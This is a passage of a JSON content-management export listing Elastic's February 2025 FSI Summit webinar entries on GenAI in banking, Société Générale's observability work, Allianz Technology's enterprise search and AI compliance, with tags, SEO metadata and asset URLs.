America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[{"title":"Awareness","label_l10n":"Awareness","keyword":"awareness","hidden_value":true,"tags":[],"locale":"en-us","uid":"blt07282f7110d8ad35","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2021-12-16T23:51:33.855Z","updated_at":"2021-12-16T23:51:33.855Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-12-17T00:33:43.099Z","user":"blt3044324473ef223b70bc674c"}}],"tags_technical_level":[{"title":"Intermediate","label_l10n":"Intermediate","keyword":"intermediate","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt09c5429e20d2ba41","created_by":"blt3e52848e0cb3c394","updated_by":"bltcb593abdd43b4039","created_at":"2021-08-24T12:52:59.050Z","updated_at":"2021-09-01T13:06:12.802Z","ACL":{},"_version":3,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-09-03T12:16:01.953Z","user":"blta4706a7723d386a4"}}],"tags_topic":[{"_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}}],"timezone":{"title_l10n":"","url":""},"title":"FSI Summit - Driving Innovation: GenAI Use cases in Banking","token":"W1OST2XL9C","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-18T21:32:28.457Z","updated_by":"blt0ef3bb174de02441","url":"/virtual-events/driving-innovation-genai-use-cases-in-banking","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"mT4oktWQ3KViirznxefuiY","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-18T21:32:33.277Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt0dc2a6fc4d033ebd","_version":2,"locale":"en-us","ACL":{},"created_at":"2025-02-18T14:28:45.174Z","created_by":"blt0ef3bb174de02441","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"How Financial Services Institutions Can Promote Modern, Interoperable Ecosystems: The Société Générale case","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eFinancial services firms must break down data silos and integrate legacy and cloud-based systems to ensure seamless operations, regulatory compliance, and customer satisfaction. In this session, Elastic’s \u003cstrong\u003eCIO, Matt Minetola\u003c/strong\u003e, \u003cstrong\u003eSociété Générale’s Senior Technical Architect, Stephane Lopes,\u003c/strong\u003e and \u003cstrong\u003eObservability Lead, Thibaut Barrault\u003c/strong\u003e, share strategies for building connected, scalable financial technology ecosystems.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003cstrong\u003eConnected systems for better banking: \u003c/strong\u003eInteroperability is essential for delivering seamless customer experiences and meeting regulatory standards.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eManaging hybrid environments: \u003c/strong\u003eSolutions must integrate cloud and on-premises systems while maintaining unified monitoring and observability.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eScalable, open platforms: \u003c/strong\u003eFuture-ready banking requires cost-effective, vendor-neutral solutions that support open standards.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eKeys to success: \u003c/strong\u003eHigh-quality data, flexible technology, and scalable architecture are critical for long-term growth.\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/p\u003e\u003cp\u003e\u003cstrong\u003eWatch the session to learn how Société Générale modernized its banking infrastructure with OpenTelemetry and Elastic, gaining full visibility across traditional and cloud systems.\u003c/strong\u003e\u003c/p\u003e","presentation_date":"2025-02-18T09:00:00.000Z","presenter":["blt91aefbbce7bce7d9","blt47fb2cc9648e1778","blt5a131df558af4a1e"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"How Financial Services Can Build Scalable, Interoperable Ecosystems – A Société Générale Case Study","seo_description_l10n":"Discover how financial institutions can break data silos, integrate cloud and on-premises systems, and scale efficiently. Watch Société Générale’s insights now.","seo_keywords_l10n":"financial services, open telemetry, data silos, societe generale","seo_image":{"uid":"bltdeca29ebd055aeac","_version":1,"title":"169165 - Ad Banners for FSI Sunmmit_300x250_Stephane Lopes.png","created_by":"blt0ef3bb174de02441","updated_by":"blt0ef3bb174de02441","created_at":"2025-02-18T14:26:04.172Z","updated_at":"2025-02-18T14:26:04.172Z","content_type":"image/png","file_size":"97398","filename":"169165_-_Ad_Banners_for_FSI_Sunmmit_300x250_Stephane_Lopes.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-18T21:23:26.034Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltdeca29ebd055aeac/67b4987c309a926961aebd45/169165_-_Ad_Banners_for_FSI_Sunmmit_300x250_Stephane_Lopes.png"},"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[{"title":"Virtual","label_l10n":"Virtual","keyword":"virtual","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltc3a97789fa82c0a5","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2022-04-21T19:17:57.147Z","updated_at":"2022-04-21T19:17:57.147Z","_content_type_uid":"tags_event_delivery","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T18:15:27.370Z","user":"blt36e890d06c5ec32c"}}],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt7898c57653ca2b6e","ACL":{},"created_at":"2020-06-17T03:23:20.767Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"financial-services","label_l10n":"Financial services","tags":[],"title":"Financial services","updated_at":"2020-07-06T22:17:46.176Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.532Z","user":"blt4b2e1169881270a8"}}],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[{"title":"Awareness","label_l10n":"Awareness","keyword":"awareness","hidden_value":true,"tags":[],"locale":"en-us","uid":"blt07282f7110d8ad35","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2021-12-16T23:51:33.855Z","updated_at":"2021-12-16T23:51:33.855Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-12-17T00:33:43.099Z","user":"blt3044324473ef223b70bc674c"}}],"tags_technical_level":[{"title":"Intermediate","label_l10n":"Intermediate","keyword":"intermediate","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt09c5429e20d2ba41","created_by":"blt3e52848e0cb3c394","updated_by":"bltcb593abdd43b4039","created_at":"2021-08-24T12:52:59.050Z","updated_at":"2021-09-01T13:06:12.802Z","ACL":{},"_version":3,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-09-03T12:16:01.953Z","user":"blta4706a7723d386a4"}}],"tags_topic":[{"_version":1,"locale":"en-us","uid":"bltc8e4f4eb4eed3ccd","ACL":{},"created_at":"2023-11-06T21:42:18.209Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"infrastructure-monitoring","label_l10n":"Infrastructure monitoring","tags":[],"title":"Infrastructure monitoring","updated_at":"2023-11-06T21:42:18.209Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.160Z","user":"blt4b2e1169881270a8"}},{"title":"OpenTelemetry","label_l10n":"Open source/standards","keyword":"opentelemetry","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt069bd34528952802","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:44:13.512Z","updated_at":"2023-11-06T20:44:13.512Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:35.903Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt4eb0f5c53cfcb73a","ACL":{},"created_at":"2023-11-06T20:43:57.712Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"open-source-standards","label_l10n":"Open source/standards","tags":[],"title":"Open source/standards","updated_at":"2023-11-06T20:43:57.712Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:38:21.485Z","user":"blt06083bb707628f5c"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt8a7a5ea52ac5d888","ACL":{},"created_at":"2020-06-17T03:30:37.843Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"observability","label_l10n":"Observability","tags":[],"title":"Observability","updated_at":"2020-07-06T22:20:06.879Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.411Z","user":"blt4b2e1169881270a8"}}],"timezone":{"title_l10n":"","url":""},"title":"FSI Summit - How Financial Services Institutions Can Promote Modern, Interoperable Ecosystems. With Société Générale","token":"0KJVXV0YLM","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-18T21:23:20.203Z","updated_by":"blt0ef3bb174de02441","url":"/virtual-events/how-fsis-can-promote-modern-interoperable-ecosystems-societe-generale-case","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"GbSXa5SFFcLPk8qJkX21eu","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-18T21:23:24.841Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltf197d3da4c4a0bf3","_version":3,"locale":"en-us","ACL":{},"created_at":"2025-02-18T10:31:50.525Z","created_by":"blt0ef3bb174de02441","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Enhancing efficiency with unified search at Allianz Technology","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eHow can financial institutions manage complex data environments while ensuring fast, secure search capabilities? \u003cstrong\u003eChristian Hoffmann, \u003c/strong\u003eand \u003cstrong\u003eMarcel Zeininger\u003c/strong\u003e, \u003cstrong\u003eElasticsearch System Specialist\u003c/strong\u003e at \u003cstrong\u003eAllianz Technology,\u003c/strong\u003e share insights with \u003cstrong\u003eOliver Oursin\u003c/strong\u003e, \u003cstrong\u003eVP of Solutions Architecture at Elastic\u003c/strong\u003e, on optimizing enterprise search.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003cstrong\u003eBeyond traditional databases: \u003c/strong\u003eRelational databases struggle with modern search demands in financial services.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eHuman vs. automated search: \u003c/strong\u003eDifferent approaches are needed to balance efficiency and accuracy.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eBuilt-in security and permissions: \u003c/strong\u003eSearch must integrate role-based access to protect sensitive data.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eCentralized search portal: \u003c/strong\u003eSimplifies developer access and ensures consistent search handling.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eUser-first approach: \u003c/strong\u003eDesigning search based on user behavior leads to better outcomes than relying solely on data structures.\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/p\u003e\u003cp\u003eGain practical strategies from industry leaders on streamlining search, improving data access, and enhancing security in financial services. \u003cstrong\u003eWatch now\u003c/strong\u003e to discover how Allianz Technology optimized enterprise search.\u003c/p\u003e","presentation_date":"2025-02-18T09:00:00.000Z","presenter":["blt7b10545443a38377","blt74db67b6a7aaad0b","blt05dbd9cd7f2f3a17"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"How Allianz Technology Optimized Enterprise Search for Financial Services","seo_description_l10n":"Discover how Allianz Technology enhanced enterprise search, improving security, efficiency, and data access in financial services. Watch the session now.","seo_keywords_l10n":"enterprise search, data management, Allianz, financial services","seo_image":{"uid":"blt248b5a500cf5483d","_version":1,"title":"169165 - Ad Banners for FSI Sunmmit_300x250_Marcel Zeininger.png","created_by":"blt0ef3bb174de02441","updated_by":"blt0ef3bb174de02441","created_at":"2025-02-18T10:28:21.441Z","updated_at":"2025-02-18T10:28:21.441Z","content_type":"image/png","file_size":"100392","filename":"169165_-_Ad_Banners_for_FSI_Sunmmit_300x250_Marcel_Zeininger.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-02-18T20:34:41.969Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt248b5a500cf5483d/67b460c5d235094c14a28612/169165_-_Ad_Banners_for_FSI_Sunmmit_300x250_Marcel_Zeininger.png"},"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[{"title":"Virtual","label_l10n":"Virtual","keyword":"virtual","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltc3a97789fa82c0a5","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2022-04-21T19:17:57.147Z","updated_at":"2022-04-21T19:17:57.147Z","_content_type_uid":"tags_event_delivery","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-05-12T18:15:27.370Z","user":"blt36e890d06c5ec32c"}}],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt7898c57653ca2b6e","ACL":{},"created_at":"2020-06-17T03:23:20.767Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"financial-services","label_l10n":"Financial services","tags":[],"title":"Financial services","updated_at":"2020-07-06T22:17:46.176Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.532Z","user":"blt4b2e1169881270a8"}}],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}},{"uid":"bltccf54d4afac13158","ACL":{},"_version":1,"created_at":"2020-11-13T00:06:52.343Z","created_by":"blt3044324473ef223b70bc674c","keyword":"americas","label_l10n":"Americas","locale":"en-us","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-12-24T13:12:41.684Z","user":"blt3e52848e0cb3c394"},"tags":[],"title":"Americas","updated_at":"2020-11-13T00:06:52.343Z","updated_by":"blt3044324473ef223b70bc674c"}],"tags_role":[],"tags_stage":[{"title":"Awareness","label_l10n":"Awareness","keyword":"awareness","hidden_value":true,"tags":[],"locale":"en-us","uid":"blt07282f7110d8ad35","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2021-12-16T23:51:33.855Z","updated_at":"2021-12-16T23:51:33.855Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-12-17T00:33:43.099Z","user":"blt3044324473ef223b70bc674c"}}],"tags_technical_level":[{"title":"Intermediate","label_l10n":"Intermediate","keyword":"intermediate","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt09c5429e20d2ba41","created_by":"blt3e52848e0cb3c394","updated_by":"bltcb593abdd43b4039","created_at":"2021-08-24T12:52:59.050Z","updated_at":"2021-09-01T13:06:12.802Z","ACL":{},"_version":3,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-09-03T12:16:01.953Z","user":"blta4706a7723d386a4"}}],"tags_topic":[{"title":"Search analytics","label_l10n":"Search analytics","keyword":"search-analytics","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt6c991eb897ec7277","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T21:30:57.427Z","updated_at":"2023-11-06T21:30:57.427Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T12:28:49.147Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltbaad5df00a89fcb2","ACL":{},"created_at":"2023-11-06T20:07:17.254Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-search-applications","label_l10n":"AI search applications","tags":[],"title":"AI search applications","updated_at":"2023-11-06T20:07:17.254Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:43.822Z","user":"blt06083bb707628f5c"}},{"_version":1,"locale":"en-us","uid":"blt240c2986db0ba465","ACL":{},"created_at":"2023-11-06T21:31:10.051Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"search-applications","label_l10n":"Search applications","tags":[],"title":"Search applications","updated_at":"2023-11-06T21:31:10.051Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:31:38.331Z","user":"blt4b2e1169881270a8"}},{"title":"Knowledge base search","label_l10n":"Knowledge base search","keyword":"knowledge-base-search","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt2c020c0c24ae64ef","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:41:47.026Z","updated_at":"2023-11-06T20:41:47.026Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:49.958Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blt2e5ece40473e6b0a","ACL":{},"created_at":"2020-06-17T03:32:06.756Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"log-analytics","label_l10n":"Log analytics","tags":[],"title":"Log analytics","updated_at":"2020-07-06T22:20:10.220Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:33.397Z","user":"blt4b2e1169881270a8"}},{"_version":3,"locale":"en-us","uid":"blt10eb11313dc454f1","ACL":{},"created_at":"2020-06-17T03:30:26.497Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"enterprise-search","label_l10n":"Search","tags":[],"title":"Search","updated_at":"2023-07-19T16:04:51.718Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.232Z","user":"blt4b2e1169881270a8"}}],"timezone":{"title_l10n":"","url":""},"title":"FSI Summit - Enhancing efficiency with unified search at Allianz Technology","token":"LGUAWV9WOU","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-02-18T21:21:41.445Z","updated_by":"blt0ef3bb174de02441","url":"/virtual-events/enhancing-efficiency-with-unified-search-at-allianz-technology","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"wYUQMAWgdbgh8ikBZMauBz","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-02-18T21:21:46.184Z","user":"blt0ef3bb174de02441","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt3093c173a88f72dd","_version":3,"locale":"en-us","ACL":{},"created_at":"2025-02-18T14:15:45.334Z","created_by":"blt0ef3bb174de02441","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"AI, compliance, and innovation: a roadmap for FSIs","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eHow can financial institutions adopt AI while staying compliant with evolving regulations? Elastic’s CIO, Matt Minetola, Senior Director of Global Government Affairs, Bill Wright, and Microsoft’s Senior Director of Industry Cloud—Financial Services, Thomas Mathew explore strategies for balancing AI innovation with regulatory requirements.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003cstrong\u003eRegulatory impact: \u003c/strong\u003eGlobal compliance laws, including the EU AI Act, are reshaping AI adoption, requiring built-in privacy and security safeguards.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eImplementation challenges: \u003c/strong\u003eFinancial services firms must address scalability, system consistency, and heightened regulatory scrutiny as AI-driven automation expands.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eStrategic approach: \u003c/strong\u003eSuccess depends on data quality, open standards for flexibility, integrated observability for reporting, and selecting partners that support both AI implementation and compliance.\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/p\u003e\u003cp\u003eDiscover how Elastic’s centralized AI-powered data platform helps financial institutions scale operations while maintaining compliance and security. \u003cstrong\u003eWatch the session \u003c/strong\u003eto learn how FSIs can navigate AI and regulatory complexity.\u003c/p\u003e","presentation_date":"2025-02-18T09:00:00.000Z","presenter":["blt91aefbbce7bce7d9","blt4912a365604f6024","bltb4b3824f12a98d9f"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"AI and Compliance in Financial Services: Strategies for Scalable, Secure Innovation","seo_description_l10n":"Learn how financial institutions can implement AI while staying compliant with evolving regulations. Watch industry leaders discuss scalable, secure AI adoption.","seo_keywords_l10n":"AI, financial services, compliance, fsi regulations, security","seo_image":{"uid":"blt72c057d2e47e634c","_version":1,"title":"169165 - Ad Banners for FSI Sunmmit_300x250_Matt 